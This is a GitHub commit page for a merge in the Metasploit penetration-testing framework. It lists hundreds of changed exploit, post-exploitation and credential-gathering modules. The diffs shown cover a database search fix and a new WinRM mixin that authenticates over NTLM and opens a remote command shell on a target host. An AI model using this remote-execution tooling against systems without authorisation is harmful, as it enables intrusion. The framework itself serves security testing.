Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

Merge branch 'master' into release

  • Loading branch information...
commit 67d0367ab7ebb692e15173a1407b3093fc846995 2 parents d9503e6 + 357fd1b
Tod Beardsley todb authored
Showing with 2,062 additions and 403 deletions.
  1. +2 −2 lib/msf/core/db_manager.rb
  2. +3 −0  lib/msf/core/exploit/mixins.rb
  3. +424 −0 lib/msf/core/exploit/winrm.rb
  4. +1 −2  lib/msf/core/handler/bind_tcp.rb
  5. +33 −32 lib/msf/core/module/author.rb
  6. +3 −0  lib/rex/io/stream_abstraction.rb
  7. +9 −2 lib/rex/post/meterpreter/client.rb
  8. +15 −0 lib/rex/text.rb
  9. +0 −2  modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb
  10. +1 −1  modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
  11. +1 −1  modules/auxiliary/admin/http/typo3_sa_2009_002.rb
  12. +0 −1  modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb
  13. +0 −1  modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb
  14. +5 −0 modules/auxiliary/admin/officescan/tmlisten_traversal.rb
  15. +2 −3 modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
  16. +1 −1  modules/auxiliary/admin/zend/java_bridge.rb
  17. +1 −1  modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
  18. +1 −1  modules/auxiliary/dos/hp/data_protector_rds.rb
  19. +1 −1  modules/auxiliary/dos/http/apache_mod_isapi.rb
  20. +1 −1  modules/auxiliary/dos/http/apache_range_dos.rb
  21. +1 −1  modules/auxiliary/dos/http/sonicwall_ssl_format.rb
  22. +0 −1  modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb
  23. +1 −2  modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb
  24. +1 −1  modules/auxiliary/dos/windows/ftp/solarftp_user.rb
  25. +1 −1  modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb
  26. +1 −1  modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
  27. +1 −1  modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
  28. +1 −1  modules/auxiliary/dos/windows/tftp/solarwinds.rb
  29. +1 −1  modules/auxiliary/gather/d20pass.rb
  30. +1 −1  modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
  31. +1 −1  modules/auxiliary/scanner/h323/h323_version.rb
  32. +1 −1  modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
  33. +1 −1  modules/auxiliary/scanner/http/axis_local_file_include.rb
  34. +1 −1  modules/auxiliary/scanner/http/barracuda_directory_traversal.rb
  35. +91 −0 modules/auxiliary/scanner/http/clansphere_traversal.rb
  36. +1 −1  modules/auxiliary/scanner/http/ektron_cms400net.rb
  37. +1 −1  modules/auxiliary/scanner/http/enum_wayback.rb
  38. +1 −1  modules/auxiliary/scanner/http/httpbl_lookup.rb
  39. +1 −1  modules/auxiliary/scanner/http/litespeed_source_disclosure.rb
  40. +1 −1  modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
  41. 0  modules/auxiliary/scanner/http/{manageengine_traversal.rb → manageengine_deviceexpert_traversal.rb}
  42. +92 −0 modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb
  43. +2 −2 modules/auxiliary/scanner/http/nginx_source_disclosure.rb
  44. +2 −2 modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
  45. +1 −1  modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb
  46. +2 −2 modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb
  47. +2 −0  modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
  48. +2 −0  modules/auxiliary/scanner/smb/smb_version.rb
  49. +1 −1  modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
  50. +1 −1  modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb
  51. +64 −0 modules/auxiliary/scanner/winrm/winrm_auth_methods.rb
  52. +79 −0 modules/auxiliary/scanner/winrm/winrm_login.rb
  53. +1 −1  modules/auxiliary/server/capture/drda.rb
  54. +1 −2  modules/auxiliary/server/http_ntlmrelay.rb
  55. +1 −1  modules/auxiliary/spoof/dns/bailiwicked_domain.rb
  56. +1 −1  modules/auxiliary/spoof/dns/bailiwicked_host.rb
  57. +1 −1  modules/auxiliary/vsploit/pii/web_pii.rb
  58. +1 −1  modules/encoders/x86/context_cpuid.rb
  59. +1 −1  modules/exploits/freebsd/tacacs/xtacacsd_report.rb
  60. +1 −1  modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
  61. +1 −0  modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
  62. +2 −2 modules/exploits/linux/http/webid_converter.rb
  63. +1 −1  modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
  64. +1 −0  modules/exploits/linux/local/sock_sendpage.rb
  65. +2 −1  modules/exploits/linux/local/udev_netlink.rb
  66. +3 −3 modules/exploits/linux/misc/lprng_format_string.rb
  67. +1 −1  modules/exploits/linux/misc/netsupport_manager_agent.rb
  68. +2 −2 modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb
  69. +1 −1  modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
  70. +1 −1  modules/exploits/multi/fileformat/peazip_command_injection.rb
  71. +2 −2 modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
  72. +1 −1  modules/exploits/multi/http/familycms_less_exec.rb
  73. +4 −4 modules/exploits/multi/http/jboss_bshdeployer.rb
  74. +4 −4 modules/exploits/multi/http/jboss_deploymentfilerepository.rb
  75. +4 −4 modules/exploits/multi/http/jboss_maindeployer.rb
  76. +272 −0 modules/exploits/multi/http/manageengine_search_sqli.rb
  77. +1 −1  modules/exploits/multi/http/openfire_auth_bypass.rb
  78. +1 −1  modules/exploits/multi/http/phpldapadmin_query_engine.rb
  79. +1 −1  modules/exploits/multi/http/phpscheduleit_start_date.rb
  80. +1 −1  modules/exploits/multi/http/plone_popen2.rb
  81. +1 −1  modules/exploits/multi/http/pmwiki_pagelist.rb
  82. +1 −1  modules/exploits/multi/http/qdpm_upload_exec.rb
  83. +2 −2 modules/exploits/multi/http/struts_code_exec.rb
  84. +2 −2 modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
  85. +1 −0  modules/exploits/multi/http/testlink_upload_exec.rb
  86. +3 −3 modules/exploits/multi/http/tomcat_mgr_deploy.rb
  87. +1 −1  modules/exploits/multi/http/traq_plugin_exec.rb
  88. +1 −1  modules/exploits/multi/http/vbseo_proc_deutf.rb
  89. +8 −2 modules/exploits/multi/http/webpagetest_upload_exec.rb
  90. +1 −1  modules/exploits/multi/misc/zend_java_bridge.rb
  91. +1 −1  modules/exploits/osx/http/evocam_webserver.rb
  92. +1 −1  modules/exploits/osx/misc/ufo_ai.rb
  93. +1 −1  modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb
  94. +1 −1  modules/exploits/solaris/sunrpc/ypupdated_exec.rb
  95. +1 −0  modules/exploits/unix/local/setuid_nmap.rb
  96. +1 −1  modules/exploits/unix/webapp/awstats_migrate_exec.rb
  97. +1 −1  modules/exploits/unix/webapp/coppermine_piceditor.rb
  98. +1 −1  modules/exploits/unix/webapp/dogfood_spell_exec.rb
  99. +1 −1  modules/exploits/unix/webapp/joomla_tinybrowser.rb
  100. +2 −2 modules/exploits/unix/webapp/openx_banner_edit.rb
  101. +1 −1  modules/exploits/unix/webapp/sphpblog_file_upload.rb
  102. +1 −0  modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
  103. +1 −0  modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
  104. +2 −2 modules/exploits/unix/webapp/twiki_history.rb
  105. +2 −2 modules/exploits/unix/webapp/twiki_search.rb
  106. +1 −0  modules/exploits/unix/webapp/xoda_file_upload.rb
  107. +1 −1  modules/exploits/windows/browser/adobe_flash_otf_font.rb
  108. +1 −1  modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
  109. +1 −1  modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
  110. +1 −1  modules/exploits/windows/browser/chilkat_crypt_writefile.rb
  111. +1 −1  modules/exploits/windows/browser/communicrypt_mail_activex.rb
  112. +1 −1  modules/exploits/windows/browser/dxstudio_player_exec.rb
  113. +1 −1  modules/exploits/windows/browser/greendam_url.rb
  114. +2 −2 modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
  115. +2 −2 modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
  116. +1 −1  modules/exploits/windows/browser/hyleos_chemviewx_activex.rb
  117. +2 −2 modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
  118. +1 −1  modules/exploits/windows/browser/ms09_043_owc_msdso.rb
  119. +1 −1  modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
  120. +1 −1  modules/exploits/windows/browser/novelliprint_callbackurl.rb
  121. +1 −1  modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
  122. +1 −1  modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
  123. +1 −1  modules/exploits/windows/browser/real_arcade_installerdlg.rb
  124. +1 −1  modules/exploits/windows/browser/trendmicro_extsetowner.rb
  125. +1 −1  modules/exploits/windows/browser/ultraoffice_httpupload.rb
  126. +2 −2 modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
  127. +1 −1  modules/exploits/windows/browser/webex_ucf_newobject.rb
  128. +1 −1  modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
  129. +2 −2 modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb
  130. +1 −1  modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb
  131. +1 −1  modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
  132. +1 −1  modules/exploits/windows/fileformat/aol_desktop_linktag.rb
  133. +1 −1  modules/exploits/windows/fileformat/aol_phobos_bof.rb
  134. +1 −1  modules/exploits/windows/fileformat/audio_wkstn_pls.rb
  135. +1 −1  modules/exploits/windows/fileformat/audiotran_pls.rb
  136. +1 −1  modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
  137. +1 −1  modules/exploits/windows/fileformat/bsplayer_m3u.rb
  138. +1 −1  modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
  139. +1 −1  modules/exploits/windows/fileformat/csound_getnum_bof.rb
  140. +1 −1  modules/exploits/windows/fileformat/digital_music_pad_pls.rb
  141. +1 −1  modules/exploits/windows/fileformat/djstudio_pls_bof.rb
  142. +1 −1  modules/exploits/windows/fileformat/dvdx_plf_bof.rb
  143. +1 −1  modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
  144. +2 −2 modules/exploits/windows/fileformat/ezip_wizard_bof.rb
  145. +1 −1  modules/exploits/windows/fileformat/fatplayer_wav.rb
  146. +3 −3 modules/exploits/windows/fileformat/feeddemon_opml.rb
  147. +1 −1  modules/exploits/windows/fileformat/foxit_reader_launch.rb
  148. +1 −1  modules/exploits/windows/fileformat/foxit_title_bof.rb
  149. +2 −2 modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
  150. +1 −1  modules/exploits/windows/fileformat/galan_fileformat_bof.rb
  151. +1 −1  modules/exploits/windows/fileformat/gta_samp.rb
  152. +2 −2 modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
  153. +2 −2 modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb
  154. +2 −2 modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb
  155. +4 −4 modules/exploits/windows/fileformat/ideal_migration_ipj.rb
  156. +1 −1  modules/exploits/windows/fileformat/microp_mppl.rb
  157. +2 −2 modules/exploits/windows/fileformat/millenium_mp3_pls.rb
  158. +2 −2 modules/exploits/windows/fileformat/mini_stream_pls_bof.rb
  159. +1 −1  modules/exploits/windows/fileformat/mplayer_sami_bof.rb
  160. +1 −1  modules/exploits/windows/fileformat/ms12_005.rb
  161. +1 −1  modules/exploits/windows/fileformat/mymp3player_m3u.rb
  162. +0 −1  modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
  163. +1 −1  modules/exploits/windows/fileformat/orbital_viewer_orb.rb
  164. +2 −2 modules/exploits/windows/fileformat/proshow_cellimage_bof.rb
  165. +1 −1  modules/exploits/windows/fileformat/real_networks_netzip_bof.rb
  166. +1 −1  modules/exploits/windows/fileformat/scadaphone_zip.rb
  167. +1 −1  modules/exploits/windows/fileformat/somplplayer_m3u.rb
  168. +1 −1  modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb
  169. +1 −1  modules/exploits/windows/fileformat/tugzip.rb
  170. +1 −1  modules/exploits/windows/fileformat/ultraiso_ccd.rb
  171. +1 −1  modules/exploits/windows/fileformat/ultraiso_cue.rb
  172. +1 −1  modules/exploits/windows/fileformat/varicad_dwb.rb
  173. +1 −1  modules/exploits/windows/fileformat/vlc_realtext.rb
  174. +1 −1  modules/exploits/windows/fileformat/vlc_smb_uri.rb
  175. +1 −1  modules/exploits/windows/fileformat/wireshark_packet_dect.rb
  176. +1 −1  modules/exploits/windows/fileformat/wm_downloader_m3u.rb
  177. +1 −1  modules/exploits/windows/fileformat/xenorate_xpl_bof.rb
  178. +3 −3 modules/exploits/windows/fileformat/xion_m3u_sehbof.rb
  179. +1 −1  modules/exploits/windows/ftp/ability_server_stor.rb
  180. +1 −1  modules/exploits/windows/ftp/absolute_ftp_list_bof.rb
  181. +2 −2 modules/exploits/windows/ftp/easyftp_list_fixret.rb
  182. +2 −2 modules/exploits/windows/ftp/easyftp_mkd_fixret.rb
  183. +1 −1  modules/exploits/windows/ftp/goldenftp_pass_bof.rb
  184. +1 −1  modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb
  185. +1 −1  modules/exploits/windows/ftp/sasser_ftpd_port.rb
  186. +1 −1  modules/exploits/windows/ftp/scriptftp_list.rb
  187. +1 −1  modules/exploits/windows/ftp/trellian_client_pasv.rb
  188. +2 −4 modules/exploits/windows/ftp/turboftp_port.rb
  189. +1 −1  modules/exploits/windows/ftp/vermillion_ftpd_port.rb
  190. +1 −1  modules/exploits/windows/ftp/xftp_client_pwd.rb
  191. +1 −0  modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
  192. +1 −1  modules/exploits/windows/http/bea_weblogic_post_bof.rb
  193. +1 −1  modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
  194. +2 −2 modules/exploits/windows/http/cyclope_ess_sqli.rb
  195. +1 −1  modules/exploits/windows/http/easyftp_list.rb
  196. +1 −1  modules/exploits/windows/http/kolibri_http.rb
  197. +1 −1  modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb
  198. +2 −2 modules/exploits/windows/http/oracle_btm_writetofile.rb
  199. +1 −1  modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb
  200. +2 −2 modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
  201. +2 −2 modules/exploits/windows/http/umbraco_upload_aspx.rb
  202. +3 −3 modules/exploits/windows/iis/iis_webdav_upload_asp.rb
  203. +1 −1  modules/exploits/windows/iis/ms01_026_dbldecode.rb
  204. +1 −1  modules/exploits/windows/iis/ms02_065_msadc.rb
  205. +4 −4 modules/exploits/windows/iis/msadc.rb
  206. +6 −5 modules/exploits/windows/local/ask.rb
  207. +8 −5 modules/exploits/windows/local/bypassuac.rb
  208. +4 −3 modules/exploits/windows/local/current_user_psexec.rb
  209. +4 −2 modules/exploits/windows/local/ms10_092_schelevator.rb
  210. +2 −2 modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
  211. +2 −2 modules/exploits/windows/local/service_permissions.rb
  212. +2 −0  modules/exploits/windows/local/trusted_service_path.rb
  213. +2 −2 modules/exploits/windows/misc/bigant_server_250.rb
  214. +2 −2 modules/exploits/windows/misc/bigant_server_usv.rb
  215. +1 −1  modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
  216. +1 −1  modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb
  217. +1 −1  modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb
  218. +1 −1  modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb
  219. +1 −1  modules/exploits/windows/misc/eureka_mail_err.rb
  220. +1 −1  modules/exploits/windows/misc/gimp_script_fu.rb
  221. +1 −1  modules/exploits/windows/misc/hp_dataprotector_new_folder.rb
  222. +1 −1  modules/exploits/windows/misc/hp_omniinet_4.rb
  223. +209 −0 modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
  224. +209 −0 modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
  225. +1 −1  modules/exploits/windows/misc/mini_stream.rb
  226. +1 −1  modules/exploits/windows/misc/nettransport.rb
  227. +1 −1  modules/exploits/windows/misc/splayer_content_type.rb
  228. +1 −1  modules/exploits/windows/misc/stream_down_bof.rb
  229. +1 −1  modules/exploits/windows/misc/ufo_ai.rb
  230. +1 −1  modules/exploits/windows/misc/wireshark_packet_dect.rb
  231. +2 −2 modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
  232. +1 −1  modules/exploits/windows/scada/codesys_web_server.rb
  233. +1 −1  modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
  234. +20 −2 modules/exploits/windows/smb/ms08_067_netapi.rb
  235. +1 −1  modules/exploits/windows/smtp/njstar_smtp_bof.rb
  236. +1 −1  modules/exploits/windows/smtp/wmailserver.rb
  237. +1 −1  modules/exploits/windows/ssh/sysax_ssh_username.rb
  238. +1 −1  modules/exploits/windows/ssl/ms04_011_pct.rb
  239. +1 −1  modules/exploits/windows/tftp/attftp_long_filename.rb
  240. +1 −1  modules/exploits/windows/wins/ms04_045_wins.rb
  241. +4 −0 modules/payloads/stagers/php/bind_tcp_ipv6.rb
  242. +112 −0 modules/post/multi/escalate/metasploit_pcaplog.rb
  243. +1 −1  modules/post/multi/gather/apple_ios_backup.rb
  244. +1 −1  modules/post/multi/gather/dns_bruteforce.rb
  245. +1 −1  modules/post/multi/gather/dns_reverse_lookup.rb
  246. +2 −1  modules/post/multi/gather/dns_srv_lookup.rb
  247. +1 −1  modules/post/multi/gather/enum_vbox.rb
  248. +1 −1  modules/post/multi/gather/env.rb
  249. +1 −1  modules/post/multi/gather/filezilla_client_cred.rb
  250. +1 −1  modules/post/multi/gather/find_vmx.rb
  251. +1 −1  modules/post/multi/gather/firefox_creds.rb
  252. +1 −1  modules/post/multi/gather/multi_command.rb
  253. +1 −1  modules/post/multi/gather/pidgin_cred.rb
  254. +1 −1  modules/post/multi/gather/ping_sweep.rb
  255. +1 −1  modules/post/multi/gather/run_console_rc_file.rb
  256. +1 −1  modules/post/multi/gather/skype_enum.rb
  257. +1 −1  modules/post/multi/general/close.rb
  258. +1 −1  modules/post/multi/general/execute.rb
  259. +2 −2 modules/post/multi/manage/multi_post.rb
  260. +1 −1  modules/post/multi/manage/sudo.rb
  261. +1 −0  modules/post/osx/gather/enum_adium.rb
  262. +2 −1  modules/post/osx/gather/enum_osx.rb
  263. +2 −1  modules/post/osx/gather/hashdump.rb
  264. +1 −1  modules/post/windows/capture/keylog_recorder.rb
  265. +2 −2 modules/post/windows/capture/lockout_keylogger.rb
  266. +4 −4 modules/post/windows/escalate/bypassuac.rb
  267. +2 −2 modules/post/windows/escalate/droplnk.rb
  268. +1 −1  modules/post/windows/escalate/getsystem.rb
  269. +2 −2 modules/post/windows/escalate/ms10_073_kbdlayout.rb
  270. +2 −2 modules/post/windows/escalate/ms10_092_schelevator.rb
  271. +2 −2 modules/post/windows/escalate/net_runtime_modify.rb
  272. +1 −1  modules/post/windows/escalate/screen_unlock.rb
  273. +2 −1  modules/post/windows/escalate/service_permissions.rb
  274. +2 −1  modules/post/windows/gather/arp_scanner.rb
  275. +2 −1  modules/post/windows/gather/bitcoin_jacker.rb
  276. +5 −2 modules/post/windows/gather/cachedump.rb
  277. +1 −1  modules/post/windows/gather/checkvm.rb
  278. +2 −1  modules/post/windows/gather/credentials/coreftp.rb
  279. +2 −1  modules/post/windows/gather/credentials/credential_collector.rb
  280. +1 −0  modules/post/windows/gather/credentials/dyndns.rb
  281. +1 −1  modules/post/windows/gather/credentials/enum_cred_store.rb
  282. +2 −1  modules/post/windows/gather/credentials/enum_picasa_pwds.rb
  283. +2 −1  modules/post/windows/gather/credentials/epo_sql.rb
  284. +1 −1  modules/post/windows/gather/credentials/filezilla_server.rb
  285. +3 −1 modules/post/windows/gather/credentials/flashfxp.rb
  286. +2 −1  modules/post/windows/gather/credentials/ftpnavigator.rb
  287. +3 −2 modules/post/windows/gather/credentials/gpp.rb
  288. +2 −1  modules/post/windows/gather/credentials/idm.rb
  289. +2 −1  modules/post/windows/gather/credentials/imail.rb
  290. +3 −2 modules/post/windows/gather/credentials/imvu.rb
  291. +2 −1  modules/post/windows/gather/credentials/meebo.rb
  292. +3 −2 modules/post/windows/gather/credentials/mremote.rb
  293. +2 −1  modules/post/windows/gather/credentials/nimbuzz.rb
  294. +3 −2 modules/post/windows/gather/credentials/outlook.rb
  295. +2 −1  modules/post/windows/gather/credentials/razorsql.rb
  296. +1 −1  modules/post/windows/gather/credentials/smartftp.rb
  297. +2 −1  modules/post/windows/gather/credentials/tortoisesvn.rb
  298. +3 −1 modules/post/windows/gather/credentials/total_commander.rb
  299. +3 −1 modules/post/windows/gather/credentials/trillian.rb
  300. +6 −3 modules/post/windows/gather/credentials/vnc.rb
Sorry, we could not display the entire diff because too many files (376) changed.
4 lib/msf/core/db_manager.rb
View
@@ -588,8 +588,8 @@ def search_modules(search_string, inclusive=false)
where_v << [ xv, xv ]
when 'os','platform'
xv = "%#{kv}%"
- where_q << ' ( module_targets.name ILIKE ? ) '
- where_v << [ xv ]
+ where_q << ' ( module_platforms.name ILIKE ? OR module_targets.name ILIKE ? ) '
+ where_v << [ xv, xv ]
when 'port'
# TODO
when 'type'
3  lib/msf/core/exploit/mixins.rb
View
@@ -88,3 +88,6 @@
# WBEM
require 'msf/core/exploit/wbemexec'
+#WinRM
+require 'msf/core/exploit/winrm'
+
424 lib/msf/core/exploit/winrm.rb
View
@@ -0,0 +1,424 @@
+# -*- coding: binary -*-
+require 'uri'
+require 'digest'
+require 'rex/proto/ntlm/crypt'
+require 'rex/proto/ntlm/constants'
+require 'rex/proto/ntlm/utils'
+require 'rex/proto/ntlm/exceptions'
+
+module Msf
+module Exploit::Remote::WinRM
+ include Exploit::Remote::NTLM::Client
+ include Exploit::Remote::HttpClient
+ #
+ # Constants
+ #
+ NTLM_CRYPT ||= Rex::Proto::NTLM::Crypt
+ NTLM_CONST ||= Rex::Proto::NTLM::Constants
+ NTLM_UTILS ||= Rex::Proto::NTLM::Utils
+ NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions
+ def initialize(info = {})
+ super
+ register_options(
+ [
+ Opt::RPORT(5985),
+ OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']),
+ OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]),
+ OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]),
+ OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ]),
+ ], self.class
+ )
+
+ register_autofilter_ports([ 80,443,5985,5986 ])
+ register_autofilter_services(%W{ winrm })
+ end
+
+ def winrm_poke(timeout = 20)
+ opts = {
+ 'uri' => datastore['URI'],
+ 'data' => Rex::Text.rand_text_alpha(8)
+ }
+ c = connect(opts)
+ to = opts[:timeout] || timeout
+ ctype = "application/soap+xml;charset=UTF-8"
+ resp, c = send_request_cgi(opts.merge({
+ 'uri' => opts['uri'],
+ 'method' => 'POST',
+ 'ctype' => ctype,
+ 'data' => opts['data']
+ }), to)
+ return resp
+ end
+
+ def parse_auth_methods(resp)
+ return [] unless resp and resp.code == 401
+ methods = []
+ methods << "Negotiate" if resp.headers['WWW-Authenticate'].include? "Negotiate"
+ methods << "Kerberos" if resp.headers['WWW-Authenticate'].include? "Kerberos"
+ methods << "Basic" if resp.headers['WWW-Authenticate'].include? "Basic"
+ return methods
+ end
+
+ def winrm_run_cmd(cmd, timeout=20)
+ resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
+ if resp.code == 401
+ print_error "Login failure! Recheck supplied credentials."
+ return resp .code
+ end
+ unless resp.code == 200
+ print_error "Got unexpected response: \n #{resp.to_s}"
+ retval == resp.code || 0
+ return retval
+ end
+ shell_id = winrm_get_shell_id(resp)
+ resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
+ cmd_id = winrm_get_cmd_id(resp)
+ resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
+ streams = winrm_get_cmd_streams(resp)
+ resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout)
+ resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id))
+ return streams
+ end
+
+ def winrm_wql_msg(wql)
+ action = winrm_uri_action("wql")
+ contents = winrm_header(action) + winrm_wql_body(wql)
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def winrm_open_shell_msg
+ action = winrm_uri_action("create_shell")
+ options = winrm_option_set([['WINRS_NOPROFILE', 'FALSE'], ['WINRS_CODEPAGE', '437']])
+ header_data = action + options
+ contents = winrm_header(header_data) + winrm_open_shell_body
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def winrm_cmd_msg(cmd,shell_id)
+ action = winrm_uri_action("send_cmd")
+ options = winrm_option_set([['WINRS_CONSOLEMODE_STDIN', 'TRUE'], ['WINRS_SKIP_CMD_SHELL', 'FALSE']])
+ selectors = winrm_selector_set([['ShellId', shell_id]])
+ header_data = action + options + selectors
+ contents = winrm_header(header_data) + winrm_cmd_body(cmd)
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def winrm_cmd_recv_msg(shell_id,cmd_id)
+ action = winrm_uri_action("recv_cmd")
+ selectors = winrm_selector_set([['ShellId', shell_id]])
+ header_data = action + selectors
+ contents = winrm_header(header_data) + winrm_cmd_recv_body(cmd_id)
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def winrm_terminate_cmd_msg(shell_id,cmd_id)
+ action = winrm_uri_action("signal_shell")
+ selectors = winrm_selector_set([['ShellId', shell_id]])
+ header_data = action + selectors
+ contents = winrm_header(header_data) + winrm_terminate_cmd_body(cmd_id)
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def winrm_delete_shell_msg(shell_id)
+ action = winrm_uri_action("delete_shell")
+ selectors = winrm_selector_set([['ShellId', shell_id]])
+ header_data = action + selectors
+ contents = winrm_header(header_data) + winrm_empty_body
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def parse_wql_response(response)
+ xml = response.body
+ columns = []
+ rows =[]
+ rxml = REXML::Document.new(xml).root
+ items = rxml.elements["///w:Items"]
+ items.elements.to_a("///w:XmlFragment").each do |node|
+ row_data = []
+ node.elements.to_a.each do |sub_node|
+ columns << sub_node.name
+ row_data << sub_node.text
+ end
+ rows << row_data
+ end
+ columns.uniq!
+ response_data = Rex::Ui::Text::Table.new(
+ 'Header' => "#{datastore['WQL']} (#{rhost})",
+ 'Indent' => 1,
+ 'Columns' => columns
+ )
+ rows.each do |row|
+ response_data << row
+ end
+ return response_data
+ end
+
+ def winrm_get_shell_id(response)
+ xml = response.body
+ shell_id = REXML::Document.new(xml).elements["//w:Selector"].text
+ end
+
+ def winrm_get_cmd_id(response)
+ xml = response.body
+ cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text
+ end
+
+ def winrm_get_cmd_streams(response)
+ streams = {
+ 'stdout' => '',
+ 'stderr' => '',
+ }
+ xml = response.body
+ rxml = REXML::Document.new(xml).root
+ rxml.elements.to_a("//rsp:Stream").each do |node|
+ next if node.text.nil?
+ streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text)
+ end
+ return streams
+ end
+
+ def generate_uuid
+ ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))
+ end
+
+ def send_request_ntlm(data, timeout = 20)
+ opts = {
+ 'uri' => datastore['URI'],
+ 'data' => data,
+ 'username' => datastore['USERNAME'],
+ 'password' => datastore['PASSWORD']
+ }
+ ntlm_options = {
+ :signing => false,
+ :usentlm2_session => datastore['NTLM::UseNTLM2_session'],
+ :use_ntlmv2 => datastore['NTLM::UseNTLMv2'],
+ :send_lm => datastore['NTLM::SendLM'],
+ :send_ntlm => datastore['NTLM::SendNTLM']
+ }
+ ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options)
+ workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
+ domain_name = datastore['DOMAIN']
+ ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name,
+ workstation_name,
+ ntlmssp_flags))
+ to = opts[:timeout] || timeout
+ begin
+ c = connect(opts)
+ ctype = "application/soap+xml;charset=UTF-8"
+ # First request to get the challenge
+ r = c.request_cgi(opts.merge({
+ 'uri' => opts['uri'],
+ 'method' => 'POST',
+ 'ctype' => ctype,
+ 'headers' => { 'Authorization' => ntlm_message_1},
+ 'data' => opts['data']
+ }))
+ resp = c.send_recv(r, to)
+ unless resp.kind_of? Rex::Proto::Http::Response
+ return [nil,nil]
+ end
+ return [nil,nil] if resp.code == 404
+ return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate']
+ # Get the challenge and craft the response
+ ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1]
